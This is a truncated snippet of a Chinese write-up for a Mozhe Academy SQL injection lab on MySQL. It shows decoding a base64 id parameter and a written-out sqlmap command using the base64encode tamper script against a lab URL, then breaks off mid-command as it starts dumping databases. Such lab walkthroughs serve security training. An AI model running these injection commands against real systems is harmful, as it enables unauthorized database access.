墨者學院 - SQL注入實戰-MySQL

兩種解法 一、利用sqlmap及其tamper模塊base64encode使用 1. 看到id後面的參數可能是base64加密後的結果,我們嘗試解密,解密結果爲1 2.查看當前的系統信息 sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode 3.暴庫 sqlmap -u "http://219.
相關文章
相關標籤/搜索